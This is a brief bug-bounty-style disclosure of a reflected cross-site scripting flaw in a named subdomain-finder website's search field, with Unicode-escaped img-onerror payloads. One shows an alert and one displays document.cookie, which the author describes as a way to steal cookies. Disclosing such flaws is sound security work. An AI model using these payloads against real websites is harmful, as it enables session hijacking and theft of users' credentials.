Reflected XSS. Steps :First open the website in any browser like chrome or Firefox.Navigate to the search bar where we search subdomain and inject the payload.Payload I:\u002D\u0022\u003Cimg src\u003Dx onerror\u003Dalert(\u0022xss\u0022)\u003E\u0022.In similar way users cookies can also be stolen using this payload Payload II:\u002D\u0022\u003Cimg src\u003Dx onerror\u003Dalert(document.cookie)\u003E\u0022
http://www.subdomainfinder.c99.nl
Screenshots
Comments (0)
To comment, please sign in.
Event ID: 1146
![User Profile Logo]( https://bhfiles.storage.googleapis.com/avatars/user_910/vetka-cvety-rozovye-cvetenie.jpg)
Total Points = 260
![User Profile Logo](https://storage.googleapis.com/bhfiles/logos/http%3A/subdomainfinder.c99.nl.jpg)
Issues Reported: 1
![Browser Image](/static/img/browser-logos/chrome/chrome_64x64.604656e0b3b4.png)
Browser Version: 84.0.4147
Operating System Linux
Added On
Aug. 29, 2020, 3:04 a.m.
Bug Type
Functional
Submitted
Independently
OS Version:
Unknown